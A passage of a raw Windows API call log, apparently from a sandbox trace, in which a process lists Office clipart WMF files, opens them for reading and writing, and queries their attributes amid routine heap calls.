(in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0103.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.128] AreFileApisANSI () returned 1 [0103.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0103.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0103.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0103.129] AreFileApisANSI () returned 1 [0103.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a8c0 [0103.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 69 [0103.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00174_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.129] GetFileType (hFile=0x368) returned 0x1 [0103.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0103.129] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.129] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.130] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.130] CloseHandle (hObject=0x368) returned 1 [0103.130] AreFileApisANSI () returned 1 [0103.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0103.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 69 [0103.130] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.130] GetFileType (hFile=0x368) returned 0x1 [0103.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0103.130] CloseHandle (hObject=0x368) returned 1 [0103.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0103.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0103.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0103.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0103.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0103.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0103.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0103.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0103.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.132] AreFileApisANSI () returned 1 [0103.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0103.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 69 [0103.132] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00174_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x20ae)) returned 1 [0103.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0103.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0103.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0103.132] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.132] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.132] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1370, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS00184_.WMF", cAlternateFileName="")) returned 1 [0103.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0103.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0103.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0103.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0103.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0103.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0103.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0103.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0103.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0103.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0103.133] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.133] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.133] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.133] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0103.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.133] AreFileApisANSI () returned 1 [0103.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0103.133] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.133] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0103.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0103.133] AreFileApisANSI () returned 1 [0103.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0103.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 69 [0103.134] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00184_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.248] GetFileType (hFile=0x33c) returned 0x1 [0103.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0103.287] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.288] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.288] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.288] CloseHandle (hObject=0x33c) returned 1 [0103.289] AreFileApisANSI () returned 1 [0103.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a9f0 [0103.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8a9f0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 69 [0103.289] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.289] GetFileType (hFile=0x33c) returned 0x1 [0103.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0103.289] CloseHandle (hObject=0x33c) returned 1 [0103.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0103.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0103.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0103.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0103.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0103.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0103.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.290] AreFileApisANSI () returned 1 [0103.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0103.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 69 [0103.291] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00184_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1370)) returned 1 [0103.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0103.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0103.291] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.291] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.291] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6d2045, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6d2045, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31f4, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS00186_.WMF", cAlternateFileName="")) returned 1 [0103.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 